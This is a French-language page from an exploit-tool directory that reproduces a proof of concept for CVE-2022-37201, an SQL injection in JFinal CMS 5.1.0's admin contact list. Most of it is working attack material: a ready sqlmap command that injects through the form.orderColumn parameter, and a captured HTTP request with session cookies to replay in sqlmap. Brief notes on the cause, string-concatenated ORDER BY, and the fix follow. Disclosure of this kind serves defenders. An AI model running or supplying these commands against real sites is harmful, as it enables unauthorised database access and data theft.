Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-37201 — CVE-2022-37201 POC | Kitploit
Outils/GitHubGitHub/againstthelight/cve-2022-37201
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubagainstthelight/cve-2022-37201

CVE-2022-37201

CVE-2022-37201 POC

Voir le dépôt
1il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-37201

CVE-2022-37201 POC

POC

Tout d'abord, vous devez installer sqlmap

vous devez définir

  • domaine cible ou IP
  • votre cookie

puis exécutez le shell

sqlmap -u http://targetDomainOrIP/jfinal_cms/jfinal_cms/admin/contact/list  --thread 8 --batch --smart  --random-agent --data "
form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db

image-20220730053527316

Parfois, vous devez savoir que le /jfinal_cms/ n'est pas nécessaire, vous devez décider de la route

principe

vous pouvez voir le code de l'interface /system/menu/list

sql.append(" order by ").append(orderBy);

Il y a une instruction SQL directement concaténée

de plus

Il n'y a aucune mesure pour empêcher l'injection SQL car l'injection SQL est requise ici

solution

En analysant ce point de fonction, j'ai découvert que l'injection de orderby est fixe, comme id, name, menu key, donc vous pouvez essayer d'utiliser une requête paramétrée ou de faire une liste blanche

De plus

mon test

POST /jfinal_cms/admin/contact/list HTTP/1.1
Host: 172.30.48.1
Content-Length: 98
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.30.48.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.30.48.1/jfinal_cms/admin/contact/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
Connection: close

form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10

Exécutez-le dans sqlmap!!! utilisez -r

[Description suggérée] JFinal CMS 5.1.0 est vulnérable à l'injection SQL.


[Informations supplémentaires] https://github.com/AgainstTheLight/someEXP_of_jfinal_cms/blob/main/jfinal_cms/sql4.md


[Type de vulnérabilité] Injection SQL


[Vendeur du produit] le groupe de développement


[Code base du produit affecté] https://github.com/jflyfox/jfinal_cms - JFinal CMS 5.1.0


[Composant affecté] Ces interfaces n'utilisent pas le même composant, ni n'ont de filtres, mais chacune utilise sa propre méthode de concaténation SQL, entraînant une injection SQL.


[Type d'attaque] À distance


[Impact exécution de code] true


[Impact divulgation d'informations] true


[Vecteurs d'attaque] La connexion utilisateur est requise


[Référence] https://github.com/AgainstTheLight/someEXP_of_jfinal_cms/blob/main/jfinal_cms/sql4.md


[Découvreur] jw5t

Télécharger l’outil